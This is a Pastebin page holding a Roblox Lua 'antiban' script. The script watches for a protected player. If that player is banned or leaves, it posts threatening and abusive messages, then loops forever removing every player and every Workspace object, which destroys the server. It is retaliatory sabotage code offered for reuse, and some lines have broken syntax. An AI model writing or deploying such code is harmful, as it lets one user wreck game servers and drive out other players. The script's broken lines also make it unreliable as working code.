Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ------Bansey's antiban script!--------------------------------------Dont take credits!------------------------------------
- ------------Don't change this!-----------
- n = "B"
- n = n.."a"
- n = n.."ns"
- n = n.."e"
- n = n.."y"
- h = Instance.new("Hint")
- m = Instance.new("Message")
- script.Name = n.."'s antiban"
- --------------You can change below------------------
- respawntime = 1
- protect = "memberhero"
- -------Version [Don't change]------------
- version = 1.05
- while true do
- if game.Players:findFirstChild(protect) == nil then
- m.Parent = game.Workspace
- m.Text = memberhero" is banned, the server will be removed..."
- wait(1)
- m.Text = "Unban "or un kick " or remove your script, else the server will be down with the following countdown!"
- wait(.5)
- for i= respawntime, 0, -1 do
- if game.Players:findFirstChild(protect) == nil then
- m.Text = "Fucking script kiddies banned firemomo45, server down."
- wait(.5)
- end
- end
- if game.Players:findFirstChild(protect) ~= nil then
- m.Text = protect.." came back, nothing will happen!"
- wait(3)
- m:remove()
- else
- while true do
- for i, p in ipairs(game.Players:getChildren()) do
- p:Remove()
- end
- for i, w in ipairs(game.Workspace:getChildren()) do
- w:Remove()
- end
- wait()
- end
- end
- else
- h.Parent = game.Workspace
- h.Text = "Don't ban memberhero PLS"
- end
- wait()
- end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement